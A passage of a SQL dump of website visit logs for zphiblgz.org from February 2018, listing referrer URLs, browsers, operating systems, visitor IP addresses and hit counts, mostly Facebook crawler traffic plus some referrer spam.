','Windows','11.0','','216.81.94.75','000',3,0),(21850,'2018-02-14','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.165.166.139','000',1,0),(21851,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',2,0),(21852,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',1,0),(21853,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',2,0),(21854,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(21855,'2018-02-14','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(21856,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.221','000',1,0),(21857,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.205','000',1,0),(21858,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.147','000',1,0),(21859,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.51','000',2,0),(21860,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.202','000',1,0),(21861,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.219','000',1,0),(21862,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.206','000',1,0),(21863,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.169','000',1,0),(21864,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.170','000',2,0),(21865,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.242','000',1,0),(21866,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.250','000',1,0),(21867,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.133','000',2,0),(21868,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.70','000',2,0),(21869,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.23','000',1,0),(21870,'2018-02-14','https://zphiblgz.org','MSIE','Windows','11.0','','68.83.223.32','000',4,0),(21871,'2018-02-14','https://zphiblgz.org/','Chrome','Windows','63.0.3239.132','','149.202.50.209','000',1,0),(21872,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.143','000',1,0),(21873,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',1,0),(21874,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(21875,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',3,0),(21876,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',2,0),(21877,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(21878,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',2,0),(21879,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',2,0),(21880,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',2,0),(21881,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',1,0),(21882,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',1,0),(21883,'2018-02-14','http://krasivoe-hd.net/','MSIE','Windows','6.0','','178.137.162.218','000',3,0),(21884,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','204.93.167.44','000',1,0),(21885,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',2,0),(21886,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',3,0),(21887,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',2,0),(21888,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',2,0),(21889,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',3,0),(21890,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',1,0),(21891,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.166','000',3,0),(21892,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.84','000',2,0),(21893,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.52','000',1,0),(21894,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.49','000',1,0),(21895,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',1,0),(21896,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.19','000',2,0),(21897,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',1,0),(21898,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',2,0),(21899,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(21900,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.167','000',1,0),(21901,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',3,0),(21902,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.168','000',1,0),(21903,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',2,0),(21904,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(21905,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',1,0),(21906,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','177.39.134.62','000',2,0),(21907,'2018-02-14','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','71.121.235.128','000',6,0),(21908,'2018-02-14','https://zphiblgz.org','Firefox','Windows','40.1','','122.150.109.137','000',2,0),(21909,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',4,0),(21910,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',2,0),(21911,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',2,0),(21912,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',3,0),(21913,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.217','000',3,0),(21914,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',1,0),(21915,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',1,0),(21916,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',2,0),(21917,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(21918,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.119','000',2,0),(21919,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.143','000',1,0),(21920,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.66','000',4,0),(21921,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.115','000',3,0),(21922,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.24','000',1,0),(21923,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.154','000',2,0),(21924,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(21925,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(21926,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',3,0),(21927,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(21928,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',2,0),(21929,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.52','000',1,0),(21930,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(21931,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',2,0),(21932,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',1,0),(21933,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',1,0),(21934,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','74.208.16.39','000',1,0),(21935,'2018-02-14','https://zphiblgz.org','Firefox','Macintosh','52.0','','71.179.88.19','000',5,0),(21936,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',2,0),(21937,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(21938,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',2,0),(21939,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',1,0),(21940,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(21941,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.178','000',3,0),(21942,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.251','000',1,0),(21943,'2018-02-14','http://site.ru','Chrome','Windows','5.0.375.99','','162.241.216.161','000',1,0),(21944,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',1,0),(21945,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(21946,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.121','000',2,0),(21947,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',2,0),(21948,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',1,0),(21949,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',1,0),(21950,'2018-02-14','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','64.173.188.21','000',1,0),(21951,'2018-02-14','https://zphiblgz.org','Opera','Windows','8.50','','64.173.188.21','000',1,0),(21952,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',2,0),(21953,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',1,0),(21954,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(21955,'2018-02-14','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.35','000',3,0),(21956,'2018-02-14','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',3,0),(21957,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(21958,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',2,0),(21959,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',2,0),(21960,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',2,0),(21961,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(21962,'2018-02-14','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.181','000',2,0),(21963,'2018-02-14','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.109','000',1,0),(21964,'2018-02-14','https://www.google.co.th/','Firefox','Windows','58.0','','182.232.64.2','000',2,0),(21965,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.228','000',1,0),(21966,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.189','000',2,0),(21967,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.203','000',1,0),(21968,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',1,0),(21969,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(21970,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',1,0),(21971,'2018-02-14','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.218','000',1,0),(21972,'2018-02-14','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.6.108','000',1,0),(21973,'2018-02-14','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.6.104','000',2,0),(21974,'2018-02-14','https://zphiblgz.org/event/5th-annual-denim-pearlz-party/','Chrome','Linux','41.0.2272.118','','66.102.6.106','000',1,0),(21975,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.120','000',1,0),(21976,'2018-02-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(21977,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','37.97.173.212','000',2,0),(21978,'2018-02-15','https://zphiblgz.org','Chrome','Windows','51.0.2704.103','','195.211.23.207','000',1,0),(21979,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',3,0),(21980,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',1,0),(21981,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',1,0),(21982,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(21983,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',2,0),(21984,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.211','000',1,0),(21985,'2018-02-15','https://zphiblgz.org','Safari','iPhone','9.0','','124.90.52.231','000',1,0),(21986,'2018-02-15','https://zphiblgz.org','Safari','iPhone','9.0','','124.90.51.84','000',1,0),(21987,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(21988,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','89.255.8.15','000',1,0),(21989,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','72.4.143.113','000',1,0),(21990,'2018-02-15','https://zphiblgz.org','Firefox','Windows','40.1','','79.115.141.170','000',2,0),(21991,'2018-02-15','http://lyrics.home-task.com/','Unknown','Unknown','Unknown','','46.119.123.218','000',3,0),(21992,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.144.173','000',3,0),(21993,'2018-02-15','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(21994,'2018-02-15','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.14','000',1,0),(21995,'2018-02-15','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(21996,'2018-02-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(21997,'2018-02-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.20','000',1,0),(21998,'2018-02-15','https://pillscheap24h.com/','MSIE','Windows','2.0','','46.119.123.218','000',3,0),(21999,'2018-02-15','http://gezlev.com.ua/','MSIE','Windows','6.0','','178.137.162.218','000',5,0),(22000,'2018-02-15','http://makler.org.ua/','MSIE','Windows','6.0','','46.118.116.121','000',1,0),(22001,'2018-02-15','https://zphiblgz.org','Firefox','Linux','51.0','','46.229.170.197','000',1,0),(22002,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','91.109.16.70','000',1,0),(22003,'2018-02-15','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(22004,'2018-02-15','http://ya.ru/?q=http%3A%2F%2Fzphiblgz.org%2Fallivestr','Chrome','Windows','17.0.963.46','','195.242.80.8','000',1,0),(22005,'2018-02-15','https://zphiblgz.org','MSIE','Windows','10.0','','185.220.101.20','000',1,0),(22006,'2018-02-15','https://zphiblgz.org','MSIE','Windows','10.0','','91.219.237.244','000',1,0),(22007,'2018-02-15','https://zphiblgz.org','MSIE','Windows','10.0','','185.220.101.25','000',2,0),(22008,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','185.107.214.133','000',2,0),(22009,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','89.218.18.38','000',1,0),(22010,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.136','000',4,0),(22011,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.146','000',1,0),(22012,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.74','000',2,0),(22013,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.75','000',1,0),(22014,'2018-02-15','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','165.255.251.207','000',1,0),(22015,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','93.125.99.48','000',1,0),(22016,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',3,0),(22017,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',1,0),(22018,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',1,0),(22019,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',2,0),(22020,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',2,0),(22021,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',1,0),(22022,'2018-02-15','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.163','000',1,0),(22023,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',1,0),(22024,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.183','000',1,0),(22025,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',1,0),(22026,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',2,0),(22027,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',5,0),(22028,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(22029,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','91.240.87.143','000',2,0),(22030,'2018-02-15','http://kinoduh.ru/','Opera','Windows','7.11','','46.118.116.121','000',2,0),(22031,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.49','000',4,0),(22032,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.51','000',2,0),(22033,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',1,0),(22034,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.197','000',1,0),(22035,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(22036,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',2,0),(22037,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',2,0),(22038,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',2,0),(22039,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',2,0),(22040,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',2,0),(22041,'2018-02-15','https://zphiblgz.org','Firefox','Windows','58.0','','138.162.0.42','000',1,0),(22042,'2018-02-15','https://zphiblgz.org','Firefox','Windows','58.0','','138.162.0.41','000',3,0),(22043,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.81','000',2,0),(22044,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.251','000',1,0),(22045,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',1,0),(22046,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.35','000',1,0),(22047,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.135','000',1,0),(22048,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.30','000',1,0),(22049,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.214','000',1,0),(22050,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',4,0),(22051,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',5,0),(22052,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',1,0),(22053,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(22054,'2018-02-15','http://zphiblgz.org/event/ms-walk-2017/','Edge','Windows','16.16299','','146.185.223.150','000',4,0),(22055,'2018-02-15','https://zphiblgz.org','Firefox','Windows','40.1','','176.108.39.13','000',2,0),(22056,'2018-02-15','https://www.google.com/','Chrome','Windows','64.0.3282.140','','108.190.20.149','000',1,0),(22057,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.25','000',2,0),(22058,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',1,0),(22059,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',1,0),(22060,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(22061,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',2,0),(22062,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',3,0),(22063,'2018-02-15','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(22064,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.213','000',3,0),(22065,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.183','000',1,0),(22066,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.48','000',1,0),(22067,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.29','000',1,0),(22068,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.245','000',1,0),(22069,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.194','000',1,0),(22070,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',3,0),(22071,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',5,0),(22072,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',2,0),(22073,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',3,0),(22074,'2018-02-15','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.80','000',3,0),(22075,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',1,0),(22076,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',3,0),(22077,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(22078,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.211','000',2,0),(22079,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',1,0),(22080,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.195','000',2,0),(22081,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','136.243.239.230','000',1,0),(22082,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',2,0),(22083,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.135','000',1,0),(22084,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(22085,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',3,0),(22086,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',1,0),(22087,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',3,0),(22088,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.85','000',1,0),(22089,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',2,0),(22090,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(22091,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.222','000',1,0),(22092,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.179','000',1,0),(22093,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.73','000',2,0),(22094,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','54.218.223.192','000',2,0),(22095,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',2,0),(22096,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.108','000',1,0),(22097,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',2,0),(22098,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(22099,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',2,0),(22100,'2018-02-15','https://cryptoswap.biz/','MSIE','Windows','3.02','','46.118.116.121','000',2,0),(22101,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',2,0),(22102,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.186','000',2,0),(22103,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',1,0),(22104,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.210','000',2,0),(22105,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',1,0),(22106,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.67','000',2,0),(22107,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',1,0),(22108,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',2,0),(22109,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.213','000',1,0),(22110,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.195','000',1,0),(22111,'2018-02-15','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(22112,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',1,0),(22113,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.48','000',2,0),(22114,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',3,0),(22115,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',3,0),(22116,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',2,0),(22117,'2018-02-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(22118,'2018-02-15','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','174.205.14.34','000',4,0),(22119,'2018-02-15','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','108.40.125.27','000',2,0),(22120,'2018-02-15','https://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','77.120.125.23','000',2,0),(22121,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',1,0),(22122,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',1,0),(22123,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.119','000',2,0),(22124,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.205','000',3,0),(22125,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(22126,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',1,0),(22127,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',1,0),(22128,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.117','000',1,0),(22129,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.194','000',1,0),(22130,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.54','000',1,0),(22131,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','